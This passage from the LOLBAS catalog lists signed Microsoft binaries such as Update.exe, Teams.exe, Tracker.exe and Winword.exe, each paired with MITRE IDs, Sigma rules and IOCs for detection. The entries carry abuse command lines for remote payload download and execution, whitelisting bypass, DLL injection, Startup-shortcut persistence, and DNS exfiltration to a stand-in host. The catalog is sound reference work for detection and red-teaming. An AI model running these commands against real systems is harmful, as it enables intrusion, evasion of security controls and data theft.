https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md Resources: - Link: https://twitter.com/ManuelBerrueta/status/1527289261350760455 - Link: https://twitter.com/bryon_/status/975835709587075072 - Link: https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017 Acknowledgement: - Person: Bryon Handle: '@bryon_' - Person: Manny Handle: '@ManuelBerrueta' ================================================ FILE: yml/OtherMSBinaries/Sqltoolsps.yml ================================================ --- Name: SQLToolsPS.exe Description: Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: SQLToolsPS.exe -noprofile -command Start-Process {PATH:.exe} Description: Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging. Usecase: Execute PowerShell command. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: PowerShell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml - Splunk: https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md Resources: - Link: https://twitter.com/pabraeken/status/993298228840992768 - Link: https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: yml/OtherMSBinaries/Squirrel.yml ================================================ --- Name: Squirrel.exe Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. Author: 'Reegun J (OCBC Bank) - @reegun21' Created: 2019-06-26 Commands: - Command: squirrel.exe --download {REMOTEURL} Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download binary Category: Download Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed - Command: squirrel.exe --update {REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: squirrel.exe --update {REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: squirrel.exe --updateRollback={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: squirrel.exe --updateRollback={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\current\Squirrel.exe' Code_Sample: - Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml Resources: - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls - Link: https://twitter.com/reegun21/status/1144182772623269889 - Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ - Link: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12 - Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56 Acknowledgement: - Person: Reegun J (OCBC Bank) Handle: '@reegun21' - Person: Adam Handle: '@Hexacorn' ================================================ FILE: yml/OtherMSBinaries/Te.yml ================================================ --- Name: te.exe Description: Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF). Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: te.exe {PATH:.wsc} Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file. Usecase: Execute Visual Basic script stored in local Windows Script Component file. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: WSH - Command: te.exe {PATH:.dll} Description: Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures. Usecase: Execute DLL file. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: DLL - Input: Custom Format Full_Path: - Path: no default Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml Resources: - Link: https://twitter.com/gn3mes1s/status/927680266390384640 - Link: https://github.com/LOLBAS-Project/LOLBAS/pull/359 - Link: https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/authoring-tests Acknowledgement: - Person: Giuseppe N3mes1s Handle: '@gN3mes1s' - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/Teams.yml ================================================ --- Name: Teams.exe Description: Electron runtime binary which runs the Teams application Author: Andrew Kisliakov Created: 2022-01-17 Commands: - Command: teams.exe Description: Generate JavaScript payload and package.json, and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app\\" before executing. Usecase: Execute JavaScript code Category: Execute Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: Node.JS - Command: teams.exe Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing. Usecase: Execute JavaScript code Category: Execute Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: Node.JS - Command: teams.exe --disable-gpu-sandbox --gpu-launcher="{CMD} &&" Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\current\Teams.exe' Code_Sample: - Code: https://github.com/lltltk/LOLBAS-research/tree/master/Teams Detection: - IOC: "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app directory created" - IOC: "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar file created/modified by non-Teams installer/updater" - Sigma: https://github.com/SigmaHQ/sigma/blob/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml Resources: - Link: https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/ Acknowledgement: - Person: Andrew Kisliakov - Person: mr.d0x Handle: '@mrd0x' ================================================ FILE: yml/OtherMSBinaries/Testwindowremoteagent.yml ================================================ --- Name: TestWindowRemoteAgent.exe Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC Author: Onat Uzunyayla Created: 2023-08-21 Commands: - Command: TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000 Description: Sends DNS query for open connection to any host, enabling exfiltration over DNS Usecase: Attackers may utilize this to exfiltrate data over DNS Category: Upload Privileges: User MitreID: T1048 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\RemoteAgent\TestWindowRemoteAgent.exe Detection: - IOC: TestWindowRemoteAgent.exe spawning unexpectedly Acknowledgement: - Person: Onat Uzunyayla ================================================ FILE: yml/OtherMSBinaries/Tracker.yml ================================================ --- Name: Tracker.exe Description: Tool included with Microsoft .Net Framework. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Tracker.exe /d {PATH:.dll} /c C:\Windows\write.exe Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. Usecase: Injection of locally stored DLL file into target process. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: DLL - Command: Tracker.exe /d {PATH:.dll} /c C:\Windows\write.exe Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. Usecase: Injection of locally stored DLL file into target process. Category: AWL Bypass Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: DLL Full_Path: - Path: no default Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml Resources: - Link: https://twitter.com/subTee/status/793151392185589760 - Link: https://attack.mitre.org/wiki/Execution Acknowledgement: - Person: Casey Smith Handle: '@subTee' ================================================ FILE: yml/OtherMSBinaries/Update.yml ================================================ --- Name: Update.exe Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. Author: Oddvar Moe Created: 2019-06-26 Commands: - Command: Update.exe --download {REMOTEURL} Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download binary Category: Download Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed - Command: Update.exe --update={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: Update.exe --update={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: Update.exe --update={PATH_SMB:folder} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: Update.exe --update={PATH_SMB:folder} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: Update.exe --updateRollback={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: Update.exe --updateRollback={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Application Whitelisting Bypass Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: CMD - Execute: Remote - Command: Update.exe --updateRollback={PATH_SMB:folder} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: Update.exe --updateRollback={PATH_SMB:folder} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Execute binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: CMD - Command: Update.exe --createShortcut={PATH:.exe} -l=Startup Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a shortcut to the specified executable in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. Usecase: Execute binary Category: Execute Privileges: User MitreID: T1547 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: EXE - Command: Update.exe --removeShortcut={PATH:.exe}-l=Startup Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page. Usecase: Execute binary Category: Execute Privileges: User MitreID: T1070 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: EXE Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\update.exe' Code_Sample: - Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml - IOC: Update.exe spawned an unknown process Resources: - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls - Link: https://twitter.com/reegun21/status/1144182772623269889 - Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408 - Link: https://twitter.com/reegun21/status/1291005287034281990 - Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ - Link: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12 - Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56 - Link: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/ Acknowledgement: - Person: Reegun Richard Jayapaul (SpiderLabs, Trustwave) Handle: '@reegun21' - Person: Mr.Un1k0d3r Handle: '@MrUn1k0d3r' - Person: Adam Handle: '@Hexacorn' - Person: Jesus Galvez ================================================ FILE: yml/OtherMSBinaries/VSDiagnostics.yml ================================================ --- Name: VSDiagnostics.exe Description: Command-line tool used for performing diagnostics. Author: Bobby Cooke Created: 2023-07-12 Commands: - Command: VSDiagnostics.exe start 1 /launch:{PATH:.exe} Description: Starts a collection session with sessionID 1 and calls kernelbase.CreateProcessW to launch specified executable. Usecase: Proxy execution of binary Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: VSDiagnostics.exe start 2 /launch:{PATH:.exe} /launchArgs:"{CMD:args}" Description: Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW. Usecase: Proxy execution of binary with arguments Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe Detection: - Sigma: https://github.com/tsale/Sigma_rules/blob/d5b4a09418edfeeb3a2d654f556d5bca82003cd7/LOL_BINs/VSDiagnostics_LoLBin.yml Resources: - Link: https://twitter.com/0xBoku/status/1679200664013135872 Acknowledgement: - Person: Bobby Cooke Handle: '@0xBoku' ================================================ FILE: yml/OtherMSBinaries/VSIISExeLauncher.yml ================================================ --- Name: VSIISExeLauncher.exe Description: Binary will execute specified binary. Part of VS/VScode installation. Author: timwhite Created: 2021-09-24 Commands: - Command: VSIISExeLauncher.exe -p {PATH:.exe} -a "{CMD:args}" Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 and up with VS/VScode installed Tags: - Execute: EXE Full_Path: - Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe' Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml - IOC: VSIISExeLauncher.exe spawned an unknown process Resources: - Link: https://github.com/timwhitez Acknowledgement: - Person: timwhite ================================================ FILE: yml/OtherMSBinaries/Visio.yml ================================================ --- Name: Visio.exe Description: Microsoft Visio Executable Author: Avihay Eldad Created: 2024-02-15 Commands: - Command: Visio.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Tags: - Download: INetCache Full_Path: - Path: C:\Program Files (x86)\Microsoft Office\Office14\Visio.exe - Path: C:\Program Files\Microsoft Office\Office14\Visio.exe - Path: C:\Program Files (x86)\Microsoft Office\Office15\Visio.exe - Path: C:\Program Files\Microsoft Office\Office15\Visio.exe - Path: C:\Program Files (x86)\Microsoft Office\Office16\Visio.exe - Path: C:\Program Files\Microsoft Office\Office16\Visio.exe - Path: C:\Program Files (x86)\Microsoft Office\root\Office14\Visio.exe - Path: C:\Program Files\Microsoft Office\root\Office14\Visio.exe - Path: C:\Program Files (x86)\Microsoft Office\root\Office15\Visio.exe - Path: C:\Program Files\Microsoft Office\root\Office15\Visio.exe - Path: C:\Program Files (x86)\Microsoft Office\root\Office16\Visio.exe - Path: C:\Program Files\Microsoft Office\root\Office16\Visio.exe Detection: - IOC: URL on a visio.exe command line - IOC: visio.exe making unexpected network connections or DNS requests Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/VisualUiaVerifyNative.yml ================================================ --- Name: VisualUiaVerifyNative.exe Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - Command: VisualUiaVerifyNative.exe Description: Generate Serialized gadget and save to - `C:\Users\%USERNAME%\AppData\Roaminguiverify.config` before executing. Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - Execute: .NetObjects Full_Path: - Path: c:\Program Files (x86)\Windows Kits\10\bin\\arm64\UIAVerify\VisualUiaVerifyNative.exe - Path: c:\Program Files (x86)\Windows Kits\10\bin\\x64\UIAVerify\VisualUiaVerifyNative.exe - Path: c:\Program Files (x86)\Windows Kits\10\bin\\UIAVerify\VisualUiaVerifyNative.exe Detection: - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml - IOC: As a Windows SDK binary, execution on a system may be suspicious Resources: - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad Acknowledgement: - Person: Lee Christensen Handle: '@tifkin' - Person: Jimmy Handle: '@bohops' ================================================ FILE: yml/OtherMSBinaries/VsLaunchBrowser.yml ================================================ --- Name: VSLaunchBrowser.exe Description: Microsoft Visual Studio browser launcher tool for web applications debugging Author: Avihay Eldad Created: 2024-04-12 Commands: - Command: VSLaunchBrowser.exe .exe {REMOTEURL:.exe} Description: Download and execute payload from remote server Usecase: It will download a remote file to INetCache and open it using the default app associated with the supplied file extension with VSLaunchBrowser as parent process. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Tags: - Download: INetCache - Command: VSLaunchBrowser.exe .exe {PATH_ABSOLUTE:.exe} Description: Execute payload via VSLaunchBrowser as parent process Usecase: It will open a local file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE - Command: VSLaunchBrowser.exe .exe {PATH_SMB} Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process Usecase: It will open a remote file using the default app associated with the supplied file extension with VSLaunchBrowser as parent process. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE - Execute: Remote Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\IDE\VSLaunchBrowser.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\IDE\VSLaunchBrowser.exe Detection: - IOC: cmd.exe as sub-process of VSLaunchBrowser - IOC: URL on a VSLaunchBrowser command line - IOC: VSLaunchBrowser making unexpected network connections or DNS requests Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/Vshadow.yml ================================================ --- Name: Vshadow.exe Description: VShadow is a command-line tool that can be used to create and manage volume shadow copies. Author: Ayberk Halaç Created: 2023-09-06 Commands: - Command: 'vshadow.exe -nw -exec={PATH_ABSOLUTE:.exe} C:' Description: Executes specified executable from vshadow.exe. Usecase: Performs execution of specified executable file. Category: Execute Privileges: Administrator MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\\x64\vshadow.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_vshadow_exec.yml - IOC: vshadow.exe usage with -exec parameter Resources: - Link: https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample Acknowledgement: - Person: Ayberk Halaç ================================================ FILE: yml/OtherMSBinaries/Vsjitdebugger.yml ================================================ --- Name: vsjitdebugger.exe Description: Just-In-Time (JIT) debugger included with Visual Studio Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Vsjitdebugger.exe {PATH:.exe} Description: Executes specified executable as a subprocess of Vsjitdebugger.exe. Usecase: Execution of local PE file as a subprocess of Vsjitdebugger.exe. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE Full_Path: - Path: c:\windows\system32\vsjitdebugger.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml Resources: - Link: https://twitter.com/pabraeken/status/990758590020452353 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: yml/OtherMSBinaries/WFMFormat.yml ================================================ --- Name: WFMFormat.exe Description: Command-line tool used for pretty-print a dump file generated by Message Farm Analyzer tool. Author: Tim Baker Created: 2024-12-05 Commands: - Command: WFMFormat.exe Description: Executes the file `tracerpt.exe` in the same folder as `WFMFormat.exe`. If the file `dumpfile.txt` (any content) exists in the current working directory, no arguments are required. Note that `WFMFormat.exe` requires .NET Framework 3.5. Usecase: Proxy execution of binary Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Requires: .NET Framework 3.5 Full_Path: - Path: C:\there\is\no\default\installation\path\WFMFormat.exe Detection: - IOC: Child process from WFMFormat.exe - IOC: tracerpt.exe processes located anywhere other than c:\windows\system32 Resources: - Link: https://www.microsoft.com/en-us/download/details.aspx?id=103244 Acknowledgement: - Person: Tim Baker (https://www.dotsec.com) ================================================ FILE: yml/OtherMSBinaries/Wfc.yml ================================================ --- Name: Wfc.exe Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - Command: wfc.exe {PATH_ABSOLUTE:.xoml} Description: Execute arbitrary C# code embedded in a XOML file. Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies Category: AWL Bypass Privileges: User MitreID: T1127 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) Tags: - Execute: XOML Full_Path: - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe Code_Sample: - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ Detection: - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml - IOC: As a Windows SDK binary, execution on a system may be suspicious Resources: - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ Acknowledgement: - Person: Matt Graeber Handle: '@mattifestation' - Person: Jimmy Handle: '@bohops' ================================================ FILE: yml/OtherMSBinaries/WinDbg.yml ================================================ --- Name: WinDbg.exe Description: Windows Debugger for advanced user-mode and kernel-mode debugging. Author: Avihay Eldad Created: 2025-07-16 Commands: - Command: windbg.exe -g {CMD} Description: Launches a command line through the debugging process; optionally add `-G` to exit the debugger automatically. Usecase: Executes an executable under a trusted microsoft signed binary. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbg.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbg.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\arm\windbg.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\arm64\windbg.exe Resources: - Link: https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-command-line-options Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/Winproj.yml ================================================ --- Name: WinProj.exe Description: Microsoft Project Executable Author: Avihay Eldad Created: 2024-02-14 Commands: - Command: WinProj.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Tags: - Download: INetCache Full_Path: - Path: C:\Program Files (x86)\Microsoft Office\Office14\WinProj.exe - Path: C:\Program Files\Microsoft Office\Office14\WinProj.exe - Path: C:\Program Files (x86)\Microsoft Office\Office15\WinProj.exe - Path: C:\Program Files\Microsoft Office\Office15\WinProj.exe - Path: C:\Program Files (x86)\Microsoft Office\Office16\WinProj.exe - Path: C:\Program Files\Microsoft Office\Office16\WinProj.exe - Path: C:\Program Files (x86)\Microsoft Office\root\Office14\WinProj.exe - Path: C:\Program Files\Microsoft Office\root\Office14\WinProj.exe - Path: C:\Program Files (x86)\Microsoft Office\root\Office15\WinProj.exe - Path: C:\Program Files\Microsoft Office\root\Office15\WinProj.exe - Path: C:\Program Files (x86)\Microsoft Office\root\Office16\WinProj.exe - Path: C:\Program Files\Microsoft Office\root\Office16\WinProj.exe Detection: - IOC: URL on a WinProj command line - IOC: WinProj making unexpected network connections or DNS requests Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/Winword.yml ================================================ --- Name: Winword.exe Description: Microsoft Office binary Author: 'Reegun J (OCBC Bank)' Created: 2019-07-19 Commands: - Command: winword.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Tags: - Download: INetCache Full_Path: - Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe - Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe - Path: C:\Program Files\Microsoft Office\Office16\winword.exe - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe - Path: C:\Program Files (x86)\Microsoft Office\Office15\winword.exe - Path: C:\Program Files\Microsoft Office\Office15\winword.exe - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe - Path: C:\Program Files (x86)\Microsoft Office\Office14\winword.exe - Path: C:\Program Files\Microsoft Office\Office14\winword.exe - Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe - Path: C:\Program Files\Microsoft Office\Office12\winword.exe - Path: C:\Program Files\Microsoft Office\Office12\winword.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml - IOC: Suspicious Office application Internet/network traffic Resources: - Link: https://twitter.com/reegun21/status/1150032506504151040 - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 Acknowledgement: - Person: 'Reegun J (OCBC Bank)' Handle: '@reegun21' ================================================ FILE: yml/OtherMSBinaries/Wsl.yml ================================================ --- Name: Wsl.exe Description: Windows subsystem for Linux executable Author: Matthew Brown Created: 2019-06-27 Commands: - Command: wsl.exe -e /mnt/c/Windows/System32/calc.exe Description: Executes calc.exe from wsl.exe Usecase: Performs execution of specified file, can be used to execute arbitrary 